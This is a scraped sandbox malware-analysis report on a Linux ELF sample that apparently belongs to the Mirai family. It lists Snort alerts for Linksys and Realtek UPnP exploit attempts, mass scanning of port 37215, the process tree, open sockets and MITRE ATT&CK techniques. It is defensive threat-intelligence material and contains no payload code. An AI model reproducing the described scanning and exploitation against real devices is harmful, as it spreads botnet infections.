192.168.2.2388.247.118.2940302802027121 05/14/22-02:15:58.044039	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	40302	80	192.168.2.23	88.247.118.29
192.168.2.2388.228.227.25145998802027121 05/14/22-02:15:49.667990	TCP	2027121	ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)	45998	80	192.168.2.23	88.228.227.251

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 02:15:40.878781080 CEST	42836	443	192.168.2.23	91.189.91.43
May 14, 2022 02:15:41.646637917 CEST	42516	80	192.168.2.23	109.202.202.202
May 14, 2022 02:15:42.388624907 CEST	63875	37215	192.168.2.23	41.180.153.28
May 14, 2022 02:15:42.388756037 CEST	63875	37215	192.168.2.23	41.150.28.27
May 14, 2022 02:15:42.388755083 CEST	63875	37215	192.168.2.23	41.223.67.142
May 14, 2022 02:15:42.388765097 CEST	63875	37215	192.168.2.23	41.189.57.69
May 14, 2022 02:15:42.388768911 CEST	63875	37215	192.168.2.23	41.15.244.117
May 14, 2022 02:15:42.388770103 CEST	63875	37215	192.168.2.23	41.114.123.9
May 14, 2022 02:15:42.388773918 CEST	63875	37215	192.168.2.23	41.30.19.200
May 14, 2022 02:15:42.388786077 CEST	63875	37215	192.168.2.23	41.114.105.108
May 14, 2022 02:15:42.388787985 CEST	63875	37215	192.168.2.23	41.157.97.137
May 14, 2022 02:15:42.388792992 CEST	63875	37215	192.168.2.23	41.105.185.90
May 14, 2022 02:15:42.388809919 CEST	63875	37215	192.168.2.23	41.230.39.179
May 14, 2022 02:15:42.388818026 CEST	63875	37215	192.168.2.23	41.240.14.164
May 14, 2022 02:15:42.388820887 CEST	63875	37215	192.168.2.23	41.111.60.71
May 14, 2022 02:15:42.388823986 CEST	63875	37215	192.168.2.23	41.47.28.124
May 14, 2022 02:15:42.388828039 CEST	63875	37215	192.168.2.23	41.134.82.56
May 14, 2022 02:15:42.388829947 CEST	63875	37215	192.168.2.23	41.143.7.125
May 14, 2022 02:15:42.388830900 CEST	63875	37215	192.168.2.23	41.58.92.219
May 14, 2022 02:15:42.388843060 CEST	63875	37215	192.168.2.23	41.98.120.141
May 14, 2022 02:15:42.388849974 CEST	63875	37215	192.168.2.23	41.129.28.197
May 14, 2022 02:15:42.388853073 CEST	63875	37215	192.168.2.23	41.90.94.58
May 14, 2022 02:15:42.388854980 CEST	63875	37215	192.168.2.23	41.78.68.188
May 14, 2022 02:15:42.388858080 CEST	63875	37215	192.168.2.23	41.103.47.30
May 14, 2022 02:15:42.388864040 CEST	63875	37215	192.168.2.23	41.78.162.26
May 14, 2022 02:15:42.388869047 CEST	63875	37215	192.168.2.23	41.159.112.237
May 14, 2022 02:15:42.388873100 CEST	63875	37215	192.168.2.23	41.5.137.49
May 14, 2022 02:15:42.388875008 CEST	63875	37215	192.168.2.23	41.243.80.57
May 14, 2022 02:15:42.388883114 CEST	63875	37215	192.168.2.23	41.61.158.63
May 14, 2022 02:15:42.388884068 CEST	63875	37215	192.168.2.23	41.205.16.213
May 14, 2022 02:15:42.388897896 CEST	63875	37215	192.168.2.23	41.232.170.228
May 14, 2022 02:15:42.388899088 CEST	63875	37215	192.168.2.23	41.3.4.141
May 14, 2022 02:15:42.388906002 CEST	63875	37215	192.168.2.23	41.215.93.116
May 14, 2022 02:15:42.388921022 CEST	63875	37215	192.168.2.23	41.37.229.137
May 14, 2022 02:15:42.388923883 CEST	63875	37215	192.168.2.23	41.123.194.243
May 14, 2022 02:15:42.388932943 CEST	63875	37215	192.168.2.23	41.178.49.149
May 14, 2022 02:15:42.388937950 CEST	63875	37215	192.168.2.23	41.130.222.225
May 14, 2022 02:15:42.388942957 CEST	63875	37215	192.168.2.23	41.36.237.211
May 14, 2022 02:15:42.388946056 CEST	63875	37215	192.168.2.23	41.98.79.167
May 14, 2022 02:15:42.388957977 CEST	63875	37215	192.168.2.23	41.147.97.76
May 14, 2022 02:15:42.388963938 CEST	63875	37215	192.168.2.23	41.92.77.171
May 14, 2022 02:15:42.388966084 CEST	63875	37215	192.168.2.23	41.36.163.182
May 14, 2022 02:15:42.388976097 CEST	63875	37215	192.168.2.23	41.230.198.179
May 14, 2022 02:15:42.388979912 CEST	63875	37215	192.168.2.23	41.6.61.131
May 14, 2022 02:15:42.388982058 CEST	63875	37215	192.168.2.23	41.244.157.28
May 14, 2022 02:15:42.388997078 CEST	63875	37215	192.168.2.23	41.172.153.113
May 14, 2022 02:15:42.388998032 CEST	63875	37215	192.168.2.23	41.27.30.13
May 14, 2022 02:15:42.388999939 CEST	63875	37215	192.168.2.23	41.247.8.22
May 14, 2022 02:15:42.389000893 CEST	63875	37215	192.168.2.23	41.157.71.36
May 14, 2022 02:15:42.389000893 CEST	63875	37215	192.168.2.23	41.63.160.53
May 14, 2022 02:15:42.389009953 CEST	63875	37215	192.168.2.23	41.234.76.244
May 14, 2022 02:15:42.389023066 CEST	63875	37215	192.168.2.23	41.98.173.86
May 14, 2022 02:15:42.389024019 CEST	63875	37215	192.168.2.23	41.198.208.251
May 14, 2022 02:15:42.389030933 CEST	63875	37215	192.168.2.23	41.0.160.176
May 14, 2022 02:15:42.389033079 CEST	63875	37215	192.168.2.23	41.180.86.6
May 14, 2022 02:15:42.389041901 CEST	63875	37215	192.168.2.23	41.119.194.12
May 14, 2022 02:15:42.389044046 CEST	63875	37215	192.168.2.23	41.76.103.7
May 14, 2022 02:15:42.389049053 CEST	63875	37215	192.168.2.23	41.25.230.180
May 14, 2022 02:15:42.389051914 CEST	63875	37215	192.168.2.23	41.185.65.236
May 14, 2022 02:15:42.389059067 CEST	63875	37215	192.168.2.23	41.73.52.177
May 14, 2022 02:15:42.389064074 CEST	63875	37215	192.168.2.23	41.69.124.36
May 14, 2022 02:15:42.389069080 CEST	63875	37215	192.168.2.23	41.226.168.83
May 14, 2022 02:15:42.389075041 CEST	63875	37215	192.168.2.23	41.134.0.133
May 14, 2022 02:15:42.389077902 CEST	63875	37215	192.168.2.23	41.66.243.31
May 14, 2022 02:15:42.389081955 CEST	63875	37215	192.168.2.23	41.143.78.10
May 14, 2022 02:15:42.389084101 CEST	63875	37215	192.168.2.23	41.14.215.194
May 14, 2022 02:15:42.389094114 CEST	63875	37215	192.168.2.23	41.174.71.84
May 14, 2022 02:15:42.389103889 CEST	63875	37215	192.168.2.23	41.26.27.235
May 14, 2022 02:15:42.389106035 CEST	63875	37215	192.168.2.23	41.132.20.242
May 14, 2022 02:15:42.389115095 CEST	63875	37215	192.168.2.23	41.17.136.219
May 14, 2022 02:15:42.389131069 CEST	63875	37215	192.168.2.23	41.105.204.2
May 14, 2022 02:15:42.389133930 CEST	63875	37215	192.168.2.23	41.72.48.176
May 14, 2022 02:15:42.389144897 CEST	63875	37215	192.168.2.23	41.207.193.240
May 14, 2022 02:15:42.389158010 CEST	63875	37215	192.168.2.23	41.195.250.189
May 14, 2022 02:15:42.389163017 CEST	63875	37215	192.168.2.23	41.82.43.252
May 14, 2022 02:15:42.389184952 CEST	63875	37215	192.168.2.23	41.179.71.233
May 14, 2022 02:15:42.389189005 CEST	63875	37215	192.168.2.23	41.7.113.1
May 14, 2022 02:15:42.389209986 CEST	63875	37215	192.168.2.23	41.211.150.13
May 14, 2022 02:15:42.389214039 CEST	63875	37215	192.168.2.23	41.193.87.242
May 14, 2022 02:15:42.389214993 CEST	63875	37215	192.168.2.23	41.24.214.123
May 14, 2022 02:15:42.389231920 CEST	63875	37215	192.168.2.23	41.9.47.115
May 14, 2022 02:15:42.389234066 CEST	63875	37215	192.168.2.23	41.239.143.51
May 14, 2022 02:15:42.389236927 CEST	63875	37215	192.168.2.23	41.159.145.92
May 14, 2022 02:15:42.389249086 CEST	63875	37215	192.168.2.23	41.54.219.199
May 14, 2022 02:15:42.389250994 CEST	63875	37215	192.168.2.23	41.103.250.120
May 14, 2022 02:15:42.389266968 CEST	63875	37215	192.168.2.23	41.110.201.228
May 14, 2022 02:15:42.389271021 CEST	63875	37215	192.168.2.23	41.15.44.42
May 14, 2022 02:15:42.389271975 CEST	63875	37215	192.168.2.23	41.154.85.66
May 14, 2022 02:15:42.389280081 CEST	63875	37215	192.168.2.23	41.72.227.143
May 14, 2022 02:15:42.389283895 CEST	63875	37215	192.168.2.23	41.161.117.57
May 14, 2022 02:15:42.389290094 CEST	63875	37215	192.168.2.23	41.129.70.43
May 14, 2022 02:15:42.389291048 CEST	63875	37215	192.168.2.23	41.75.11.250
May 14, 2022 02:15:42.389307976 CEST	63875	37215	192.168.2.23	41.186.167.18
May 14, 2022 02:15:42.389313936 CEST	63875	37215	192.168.2.23	41.184.84.117
May 14, 2022 02:15:42.389317036 CEST	63875	37215	192.168.2.23	41.25.72.19
May 14, 2022 02:15:42.389322996 CEST	63875	37215	192.168.2.23	41.71.188.138
May 14, 2022 02:15:42.389332056 CEST	63875	37215	192.168.2.23	41.133.43.78
May 14, 2022 02:15:42.389334917 CEST	63875	37215	192.168.2.23	41.234.83.80
May 14, 2022 02:15:42.389338017 CEST	63875	37215	192.168.2.23	41.85.93.152
May 14, 2022 02:15:42.389339924 CEST	63875	37215	192.168.2.23	41.206.29.220

HTTP Request Dependency Graph

127.0.0.1:80

192.168.0.14:80

System Behavior

Analysis Process: NE8O7liu0s PID: 6225, Parent PID: 6124

General

Start time:	02:15:40
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	/tmp/NE8O7liu0s
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6227, Parent PID: 6225

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6229, Parent PID: 6227

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6230, Parent PID: 6227

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6232, Parent PID: 6227

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6233, Parent PID: 6227

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6237, Parent PID: 6227

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6239, Parent PID: 6227

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6241, Parent PID: 6227

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: NE8O7liu0s PID: 6243, Parent PID: 6227

General

Start time:	02:15:41
Start date:	14/05/2022
Path:	/tmp/NE8O7liu0s
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: gnome-session-binary PID: 6283, Parent PID: 1477

General

Start time:	02:17:01
Start date:	14/05/2022
Path:	/usr/libexec/gnome-session-binary
Arguments:	n/a
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Analysis Process: sh PID: 6283, Parent PID: 1477

General

Start time:	02:17:01
Start date:	14/05/2022
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: gsd-print-notifications PID: 6283, Parent PID: 1477

General

Start time:	02:17:01
Start date:	14/05/2022
Path:	/usr/libexec/gsd-print-notifications
Arguments:	/usr/libexec/gsd-print-notifications
File size:	51840 bytes
MD5 hash:	71539698aa691718cee775d6b9450ae2

Analysis Process: gsd-print-notifications PID: 6289, Parent PID: 6283

General

Start time:	02:17:01
Start date:	14/05/2022
Path:	/usr/libexec/gsd-print-notifications
Arguments:	n/a
File size:	51840 bytes
MD5 hash:	71539698aa691718cee775d6b9450ae2

Analysis Process: gsd-print-notifications PID: 6290, Parent PID: 6289

General

Start time:	02:17:01
Start date:	14/05/2022
Path:	/usr/libexec/gsd-print-notifications
Arguments:	n/a
File size:	51840 bytes
MD5 hash:	71539698aa691718cee775d6b9450ae2

Analysis Process: gsd-printer PID: 6290, Parent PID: 1

General

Start time:	02:17:01
Start date:	14/05/2022
Path:	/usr/libexec/gsd-printer
Arguments:	/usr/libexec/gsd-printer
File size:	31120 bytes
MD5 hash:	7995828cf98c315fd55f2ffb3b22384d

Analysis Process: xfce4-session PID: 6313, Parent PID: 1900

General

Start time:	02:17:33
Start date:	14/05/2022
Path:	/usr/bin/xfce4-session
Arguments:	n/a
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Analysis Process: rm PID: 6313, Parent PID: 1900

General

Start time:	02:17:33
Start date:	14/05/2022
Path:	/usr/bin/rm
Arguments:	rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38100 -> 88.198.26.37:80
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42472 -> 172.65.178.37:55555
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55700 -> 172.65.7.26:55555
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43676 -> 172.65.30.39:55555
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35476 -> 172.65.184.34:55555
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42388 -> 88.193.168.207:80
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41178 -> 88.221.144.129:80
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45998 -> 88.228.227.251:80
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45742 -> 88.163.115.235:80
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44584 -> 88.90.176.237:80
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37604 -> 88.125.107.25:80
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36744 -> 172.65.79.192:55555
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35856 -> 172.65.130.160:55555
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60752 -> 172.65.39.149:55555
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50988 -> 88.85.234.170:80
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54402 -> 172.65.71.210:55555
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59474 -> 172.65.67.150:55555
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44500 -> 172.65.188.50:55555
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36698 -> 156.226.58.60:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54380 -> 156.250.122.25:52869
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40302 -> 88.247.118.29:80
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34398 -> 88.193.152.180:80
Source: Traffic	Snort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34326 -> 88.148.69.67:80
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42616 -> 172.65.150.139:55555
Source: Traffic	Snort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44990 -> 172.65.169.95:55555
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50224 -> 156.245.44.43:52869

Source: /tmp/NE8O7liu0s (PID: 6225)	Socket: 127.0.0.1::45837
Source: /tmp/NE8O7liu0s (PID: 6243)	Socket: 0.0.0.0::52869
Source: /tmp/NE8O7liu0s (PID: 6243)	Socket: 0.0.0.0::8080
Source: /tmp/NE8O7liu0s (PID: 6243)	Socket: 0.0.0.0::443
Source: /tmp/NE8O7liu0s (PID: 6243)	Socket: 0.0.0.0::37215
Source: /tmp/NE8O7liu0s (PID: 6243)	Socket: 0.0.0.0::23
Source: /tmp/NE8O7liu0s (PID: 6243)	Socket: 0.0.0.0::80
Source: /tmp/NE8O7liu0s (PID: 6243)	Socket: 0.0.0.0::0

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	API monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report NE8O7liu0s

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: NE8O7liu0s PID: 6225, Parent PID: 6124

General

Analysis Process: NE8O7liu0s PID: 6227, Parent PID: 6225

General

Analysis Process: NE8O7liu0s PID: 6229, Parent PID: 6227

General

Analysis Process: NE8O7liu0s PID: 6230, Parent PID: 6227

General

Analysis Process: NE8O7liu0s PID: 6232, Parent PID: 6227

General

Analysis Process: NE8O7liu0s PID: 6233, Parent PID: 6227

General

Analysis Process: NE8O7liu0s PID: 6237, Parent PID: 6227

General

Analysis Process: NE8O7liu0s PID: 6239, Parent PID: 6227

General

Linux Analysis Report
NE8O7liu0s